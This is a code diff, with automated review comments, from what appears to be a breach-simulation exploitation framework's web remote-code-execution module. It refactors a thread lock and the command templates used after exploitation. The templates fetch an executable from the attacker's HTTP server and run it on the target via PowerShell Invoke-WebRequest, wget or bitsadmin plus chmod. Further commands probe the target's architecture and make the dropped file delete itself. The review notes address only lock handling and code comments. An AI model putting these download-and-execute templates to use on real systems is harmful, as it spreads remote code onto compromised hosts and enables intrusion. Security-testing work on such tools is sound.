Bugfix: model.__init__ changed (I forgot to add the file to the branch), and the server lock is no longer a singleton
parent
3f8d63c2d9
commit
8e684a3fad
|
@ -13,8 +13,6 @@ __author__ = 'VakarisZ'
|
||||||
|
|
||||||
LOG = logging.getLogger(__name__)
|
LOG = logging.getLogger(__name__)
|
||||||
|
|
||||||
LOCK = Lock()
|
|
||||||
|
|
||||||
class WebRCE(HostExploiter):
|
class WebRCE(HostExploiter):
|
||||||
|
|
||||||
def __init__(self, host):
|
def __init__(self, host):
|
||||||
|
@ -237,14 +235,15 @@ class WebRCE(HostExploiter):
|
||||||
return False
|
return False
|
||||||
# Determine which destination path to use
|
# Determine which destination path to use
|
||||||
LOG.debug("Monkey path found")
|
LOG.debug("Monkey path found")
|
||||||
|
lock = Lock()
|
||||||
path = WebRCE.get_monkey_dest_path(config, src_path)
|
path = WebRCE.get_monkey_dest_path(config, src_path)
|
||||||
if not path:
|
if not path:
|
||||||
return False
|
return False
|
||||||
# To avoid race conditions we pass a locked lock to http servers thread
|
# To avoid race conditions we pass a locked lock to http servers thread
|
||||||
LOCK.acquire()
|
lock.acquire()
|
||||||
# Create server for http download and wait for it's startup.
|
# Create server for http download and wait for it's startup.
|
||||||
http_path, http_thread = HTTPTools.create_locked_transfer(host, src_path, LOCK)
|
http_path, http_thread = HTTPTools.create_locked_transfer(host, src_path, lock)
|
||||||
LOCK.acquire()
|
lock.acquire()
|
||||||
if not http_path:
|
if not http_path:
|
||||||
LOG.debug("Exploiter failed, http transfer creation failed.")
|
LOG.debug("Exploiter failed, http transfer creation failed.")
|
||||||
return False
|
return False
|
||||||
|
@ -278,7 +277,7 @@ class WebRCE(HostExploiter):
|
||||||
LOG.info("Powershell not found in host. Using bitsadmin to download.")
|
LOG.info("Powershell not found in host. Using bitsadmin to download.")
|
||||||
backup_command = RDP_CMDLINE_HTTP % {'monkey_path': path, 'http_path': http_path}
|
backup_command = RDP_CMDLINE_HTTP % {'monkey_path': path, 'http_path': http_path}
|
||||||
resp = exploiter(url, backup_command)
|
resp = exploiter(url, backup_command)
|
||||||
LOCK.release()
|
lock.release()
|
||||||
http_thread.join(DOWNLOAD_TIMEOUT)
|
http_thread.join(DOWNLOAD_TIMEOUT)
|
||||||
http_thread.stop()
|
http_thread.stop()
|
||||||
LOG.info("Uploading proccess finished")
|
LOG.info("Uploading proccess finished")
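Review bot: The `if not http_path:` branch returns `False` right after the second `lock.acquire()` without calling `http_thread.join()` or `http_thread.stop()`, so any server thread that did start is left running; stop it, if one was started, before that return. The second `lock.acquire()` also has no timeout: if `HTTPTools.create_locked_transfer` can fail before its thread releases the lock (its body is not in this diff), this call blocks indefinitely. A `threading.Event` set by the server once it is listening, waited on with `event.wait(DOWNLOAD_TIMEOUT)`, would bound the wait, though that changes the helper's signature. The existing comment could also say that the second acquire is the wait for server startup, e.g. `# Blocks until the HTTP server thread releases the lock, i.e. is ready`. The enclosing method starts and ends outside these hunks, so other return paths between the acquire and `lock.release()` could not be checked.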
|
||||||
|
|
|
@ -17,13 +17,19 @@ RDP_CMDLINE_HTTP_VBS = 'set o=!TMP!\!RANDOM!.tmp&@echo Set objXMLHTTP=CreateObje
|
||||||
DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del /f /q %(file_path)s & if not exist %(file_path)s exit)) > NUL 2>&1'
|
DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del /f /q %(file_path)s & if not exist %(file_path)s exit)) > NUL 2>&1'
|
||||||
|
|
||||||
# Commands used for downloading monkeys
|
# Commands used for downloading monkeys
|
||||||
POWERSHELL_HTTP = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \\\'%%(http_path)s\\\' -OutFile \\\'%%(monkey_path)s\\\' -UseBasicParsing; %%(monkey_path)s %s %%(parameters)s\"" % (DROPPER_ARG, )
|
POWERSHELL_HTTP_UPLOAD = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \\\'%(http_path)s\\\' -OutFile \\\'%(monkey_path)s\\\' -UseBasicParsing\""
|
||||||
WGET_HTTP = "wget -O %%(monkey_path)s %%(http_path)s && chmod +x %%(monkey_path)s && %%(monkey_path)s %s %%(parameters)s" % (DROPPER_ARG, )
|
POWERSHELL_HTTP_UPLOAD_NOT_ESCAPED = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \'%(http_path)s\' -OutFile \'%(monkey_path)s\' -UseBasicParsing\""
|
||||||
RDP_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&&start /b %%(monkey_path)s %%(type)s %%(parameters)s'
|
WGET_HTTP_UPLOAD = "wget -O %(monkey_path)s %(http_path)s"
|
||||||
|
RDP_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s'
|
||||||
|
CHMOD_MONKEY = "chmod +x %(monkey_path)s"
|
||||||
|
RUN_MONKEY = " %(monkey_path)s %(monkey_type)s %(parameters)s"
|
||||||
# Commands used to check for architecture and if machine is exploitable
|
# Commands used to check for architecture and if machine is exploitable
|
||||||
CHECK_WINDOWS = "echo %s && wmic os get osarchitecture" % ID_STRING
|
CHECK_COMMAND = "echo %s" % ID_STRING
|
||||||
CHECK_LINUX = "echo %s && lscpu" % ID_STRING
|
# Architecture checking commands
|
||||||
|
ARCH_WINDOWS = "wmic os get osarchitecture"
|
||||||
|
ARCH_LINUX = "lscpu"
|
||||||
|
|
||||||
# Commands used to check if monkeys already exists
|
# Commands used to check if monkeys already exists
|
||||||
EXISTS = "ls %s"
|
EXISTS = "ls %s"
|
||||||
|
|
||||||
|
DOWNLOAD_TIMEOUT = 300
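Review bot: `POWERSHELL_HTTP_UPLOAD` and `POWERSHELL_HTTP_UPLOAD_NOT_ESCAPED` differ only in how the single quotes are escaped, and nothing says which caller needs which. Add a one-line comment above each stating the context it is meant for; the callers are not in this diff, so the exact wording has to come from the author. `RUN_MONKEY` starts with a space, presumably because it is appended to a download command, and a comment such as `# Appended to an upload command; leading space is intentional` would keep someone from "fixing" it. `DOWNLOAD_TIMEOUT = 300` should state its unit: web_rce.py passes it to `http_thread.join()`, so `# seconds` appears to be right.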
|